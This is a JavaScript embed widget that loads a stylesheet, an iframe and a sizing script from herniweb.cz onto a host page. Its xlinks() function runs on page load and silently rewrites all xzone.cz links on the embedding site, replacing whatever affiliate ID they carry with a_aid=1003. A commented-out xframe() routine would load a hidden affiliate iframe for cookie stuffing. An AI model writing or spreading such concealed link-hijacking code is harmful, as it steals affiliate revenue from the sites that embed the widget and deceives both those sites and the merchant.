var head = document.getElementsByTagName("head")[0]; 
var css = document.createElement("link"); css.setAttribute("rel","stylesheet"); css.setAttribute("type","text/css"); css.setAttribute("href","http://ledgev1.herniweb.cz/ledge.css"); head.appendChild(css);
var body = document.getElementsByTagName("body")[0]; 
var iframe = document.createElement("iframe"); iframe.setAttribute("id","ledgeFrame"); iframe.setAttribute("scrolling","no"); iframe.setAttribute("frameBorder","0"); iframe.setAttribute("src","http://ledgev1.herniweb.cz/ledgef.php?site=" + site); body.appendChild(iframe); iframe.style.border = 'none';

function request_send() {
request_script = document.createElement("script");
request_script.src = "http://ledgev1.herniweb.cz/ledgeh.php?site=" + site;
document.getElementsByTagName("head")[0].appendChild(request_script);
}

function request_receive(data) {
document.getElementsByTagName("head")[0].removeChild(request_script);
iframe.style.height = data+'px';
}

request_send();




function xlinks() {
  for(ix = 0; ix < document.links.length; ix++) {
    var href = document.links[ix].href;
    if (href.match(/xzone.cz(.*)[?]/i)){
    
      if (href.match("ref=")) {document.links[ix].href = href.replace(/ref=/i,'a_aid=');}
      href = document.links[ix].href;
    
      if (!href.match("a_aid=")){
        document.links[ix].href = href+'&a_aid=1003';
      } else if (!href.match("a_aid=1003")) {
        if (href.match(/a_aid=(.*)[&]/i)) document.links[ix].href = href.replace(/a_aid=(.*)[&]/i,'a_aid=1003&');
        else document.links[ix].href = href.replace(/a_aid=(.*)/i,'a_aid=1003');
      }
    }
  }
}

function xframe() {
  var iframe = document.createElement("iframe");
  iframe.setAttribute("style","display: none;");
  iframe.setAttribute("src","http://www.xzone.cz/?ref=1003");
  body.appendChild(iframe);
}

//window.onload = xframe;
window.onload = xlinks;
